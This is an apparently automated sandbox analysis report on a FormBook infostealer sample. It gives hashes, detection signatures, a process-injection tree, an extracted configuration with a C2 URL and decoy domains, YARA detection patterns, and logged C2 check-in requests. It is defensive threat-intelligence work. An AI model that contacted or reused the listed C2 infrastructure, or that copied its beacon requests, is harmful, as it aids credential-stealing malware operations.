Loading ...

Play interactive tourEdit tour

Analysis Report 444890321.exe

Overview

General Information

Sample Name:444890321.exe
Analysis ID:433174
MD5:f161fe51fee0cd2f542ea759241c88cb
SHA1:cd75d9c5a293151ad50dfa1d05edb5871fc08ad5
SHA256:d2d2d97ab2f2c78a230c58a61296504419d0b545c6c6d76193b654dfe9937499
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 444890321.exe (PID: 5820 cmdline: 'C:\Users\user\Desktop\444890321.exe' MD5: F161FE51FEE0CD2F542EA759241C88CB)
    • 444890321.exe (PID: 6092 cmdline: 'C:\Users\user\Desktop\444890321.exe' MD5: F161FE51FEE0CD2F542EA759241C88CB)
      • backgroundTaskHost.exe (PID: 4160 cmdline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
        • cmd.exe (PID: 5568 cmdline: /c del 'C:\Users\user\Desktop\444890321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • WWAHost.exe (PID: 4160 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.444890321.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.444890321.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.444890321.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        1.1.444890321.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.444890321.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.111bjs.com/ccr/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 444890321.exeMetadefender: Detection: 17%Perma Link
          Source: 444890321.exeReversingLabs: Detection: 67%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 444890321.exeJoe Sandbox ML: detected
          Source: 1.2.444890321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.WWAHost.exe.431f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 10.2.WWAHost.exe.34498d0.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.444890321.exe.23b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.444890321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 444890321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: WWAHost.pdb source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 444890321.exe, 00000001.00000002.265580843.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 444890321.exe, 00000000.00000003.207642896.00000000099C0000.00000004.00000001.sdmp, 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.470470953.0000000003F0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 444890321.exe, WWAHost.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.238969976.000000000F6D2000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\TileDataRepository.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\Windows.StateRepository.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\SYSTEM32\usermgrcli.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\StateRepository.Core.dll
          Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\usermgrproxy.dll
          Source: C:\Users\user\Desktop\444890321.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\444890321.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\444890321.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\444890321.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.169.40.107:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.111bjs.com/ccr/
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp HTTP/1.1Host: www.mekarauroko7389.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp HTTP/1.1Host: www.oklahomasundayschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp HTTP/1.1Host: www.shamushalkowich.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp HTTP/1.1Host: www.mekarauroko7389.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp HTTP/1.1Host: www.oklahomasundayschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp HTTP/1.1Host: www.shamushalkowich.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.mekarauroko7389.com
          Source: explorer.exe, 00000004.00000000.234301981.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 444890321.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 444890321.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WWAHost.exe, 0000000A.00000002.472331929.000000000480F000.00000004.00000001.sdmpString found in binary or memory: https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRev
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
